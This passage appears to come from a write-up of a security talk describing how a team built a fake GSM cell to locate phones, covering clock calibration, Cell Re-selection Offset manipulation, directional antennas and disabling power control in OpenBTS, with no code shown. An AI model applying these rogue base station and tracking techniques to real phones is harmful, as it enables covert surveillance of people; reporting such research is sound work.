No precision of the clock (needs to be very precise) turned out frequency was too high by 900hz (the standard only allows for 45hz deviation) Fixed? Not entirely, devices did finally register to the fake cell but it still wasn’t working properly > the team bought a better clock > this finally solved the issue!

Once registered to the fake cell phones stayed registered for 1.8Km; within the range of the phone. Max distance device registered 15 meters, not enough power….could not beat the power of the real base station. You win this race by manipulating Cell Re-selection Offset (CRO); which is used for roaming between cells.

The final solution involved getting close to target and switching to directional antenna.

Here it was thought that the more power you receive from the target, you are pointing at target? This assumption was wrong, power fluctuated even when antenna was stable; the cause was BTS telling the target device to lower or raise it’s power….this was happening!

Fix = Disabled this mechanism in the OpenBST source code but only once the kit was close enough to move into directional mode…then the team finally had a WIN : )

With this final solution the team were able to pinpoint devices down to 20 metres (in an open field environment), these figures were not quite as good in an urban environment.

With this problem finally solved (after several months of work), the team stated their future work would be to attempt a solution for achieving the same for 3G networks. Whilst the team are limited by the fact that no open source 3G base station implementation exists they are optimistic that it is possible with 3G.